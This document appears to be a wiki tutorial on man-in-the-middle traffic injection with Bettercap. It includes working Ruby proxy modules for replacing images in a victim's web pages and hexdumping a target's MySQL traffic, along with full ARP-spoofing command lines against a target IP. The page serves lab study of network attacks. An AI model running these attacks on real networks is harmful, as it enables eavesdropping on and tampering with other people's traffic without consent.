From charlesreid1

What is traffic injection?

The term "traffic injection," in the context of a Man in the Middle attack, refers to any situation where the attacker is conducting a man in the middle attack and is actively modifying traffic passing between the sheep and the gateway.

This can take many forms, of course:

  • Attacker can modify traffic from gateway to sheep, or from sheep to gateway
  • Attacker can selectively drop packets for denial of service of certain protocols/content
  • Attacker can perform search/replace on traffic (e.g., replace all images with other images)
  • Attacker can inject things into traffic, e.g., particular content, javascript/css files, etc.

How traffic injection works

Typically, the way this works is, a man in the middle attacker will set up an HTTP and/or HTTPS proxy server. On one side of the proxy server is the sheep, and on the other side of the proxy server is the client. As traffic from the sheep enters the proxy server, it is passed through any traffic filters, its headers updated, and when (if) it comes out the other side, it is forwarded along to the gateway. Likewise, as traffic from the gateway enters the proxy server, it is passed through different traffic filters, its headers updated, and when (if) it comes out the other side, it is forwarded along to the sheep.

This gives the attacker control of traffic. The different forms of traffic injection (modification, selective drops, search/replace, etc) take the form of different filters that the attacker writes and drops into the proxy server.

Implementation

To actually implement a traffic injection attack, you can use the Bettercap tool to perform a man in the middle attack. Bettercap implements a built-in http and https proxy, which allows you to execute a man-in-the-middle attack and perform traffic injection/modification attacks on the fly, all in one tool. Bettercap can also interface with another non-Bettercap proxy program.

To implement various filters in the proxy, you use Ruby, the language in which Bettercap is implemented.

Bettercap proxy

Bettercap has a --proxy option to enable the proxy. Once you enable the proxy, you'll also want to pick a proxy module using the --proxy-module flag - proxy modules are the filters you're writing and dropping into your proxy filter. These filters are written in Ruby, and there are three existing modules: injecthtml, injectcss. injectjs.

To get help, just add the -h flag after the proxy module specification:

bettercap --proxy-module injecthtml -h

This will print out the bettercap help, with info about the injecthtml module at the very bottom.

Custom Proxy Module: Replacing Images

As a quick example, let's use an example from the bettercap proxy modules repo to illustrate how all of this fits together.

The ruby script [1] is given below:

replace-images.rb

=begin
BETTERCAP
Author : Simone 'evilsocket' Margaritelli
Email  : evilsocket@gmail.com
Blog   : http://www.evilsocket.net/
This project is released under the GPL 3 license.
=end

# This module requires the --httpd argument being passed
# to bettercap and the --httpd-path pointing to a folder
# which contains a "hack.jpg" image.
class ReplaceImages < BetterCap::Proxy::HTTP::Module
  meta(
    'Name'        => 'ReplaceImages',
    'Description' => 'Replace all images on web pages.',
    'Version'     => '1.0.0',
    'Author'      => "Simone 'evilsocket' Margaritelli",
    'License'     => 'GPL3'
  )

  def initialize
    opts = BetterCap::Context.get.options.servers
    # make sure the server is running
    raise BetterCap::Error, "The ReplaceImages proxy module needs the HTTPD ( --httpd argument ) running." unless opts.httpd
    # make sure the file we need actually exists
    raise BetterCap::Error, "No hack.png file found in the HTTPD path ( --httpd-path argument ) '#{opts.httpd_path}'" \
      unless File.exist? "#{opts.httpd_path}/hack.jpg"

    @image_url = "\"http://#{BetterCap::Context.get.iface.ip}:#{opts.httpd_port}/hack.png\""
  end

  def on_request( request, response )
    # is it a html page?
    if response.content_type =~ /^text\/html.*/
      BetterCap::Logger.info "Replacing http://#{request.host}#{request.path} images."

      response.body.gsub! %r/["'][https:\/\/]*[^\s]+\.(png|jpg|jpeg|bmp|gif)["']/i, @image_url
    end
  end
end

For the lulz, let's suppose our goal is to tamper with the sheep's http traffic, and specifically, our goal is to replace all of the images in their stream with this one:

Ohai.jpg

Pick a directory to put your materials into. This directory will contain a folder called img/, which will contain images being served up, specifically hack.jpg. It will also contain replace_images.rb, the ruby script above. Now we can run bettercap from this directory, specifying the custom Ruby proxy module with the --proxy-module replace_images argument. You will also need to set the --httpd and --httpd-path options to run an http server, from the directory that contains your hack.jpg image, to serve up the image to the sheep.

The whole thing looks like this:

bettercap -I wlan2 -O bettercap_proxy.log -S ARP -X \
    --proxy --proxy-module replace_images \
    --httpd --httpd-path img \
    --gateway 192.168.0.1 --target 192.168.0.7

This worked like a charm. I ran the script on the attacker, closed the browser on the sheep, gave it about 15 seconds, and then opened the browser. It slows down the loading time by a substantial amount - but as you can see, it's worth it:

OhaiSuccess.jpg

To see more information, check out the MITM labs: MITM Lab/Bettercap to Replace Images

Custom Proxy Module: MySQL Eavesdropping

The bettercap documentation has a nice example of using the TCP proxy to eavesdrop on TCP traffic: [2]

These register TCP packets as events. Here is a link to bettercap's Ruby documentation with more info about event objects: [3]

Let's create a custom proxy module called eavesdrop_mysql.rb, which has the following contents:

eavesdrop_mysql.rb:

class Example < BetterCap::Proxy::TCP::Module
  meta(
    'Name'        => 'Example',
    'Description' => 'Example TCP proxy module.',
    'Version'     => '1.0.0',
    'Author'      => "Simone 'evilsocket' Margaritelli",
    'License'     => 'GPL3'
  )
  
  # Received when the victim is sending data to the upstream server.
  def on_data( event )
    # You can access the request data being sent using the event object:
    #
    #   event.data.gsub!( 'SOMETHING', 'ELSE' )
    #
    BetterCap::Logger.raw "\n#{BetterCap::StreamLogger.hexdump( event.data )}\n"
  end
  # Received when the upstream server is sending a response to the victim.
  def on_response( event )
    # You can access the response data being received using the event object:
    #
    #   event.data.gsub!( 'SOMETHING', 'ELSE' )
    #
    BetterCap::Logger.raw "\n#{BetterCap::StreamLogger.hexdump( event.data )}\n"
  end
end

Now you can run an ARP attack with bettercap, turn on the tcp proxy, and point it to the sheep's MySQL port.

bettercap --tcp-proxy-module example.rb --tcp-proxy-upstream 192.168.0.7:3306

Flags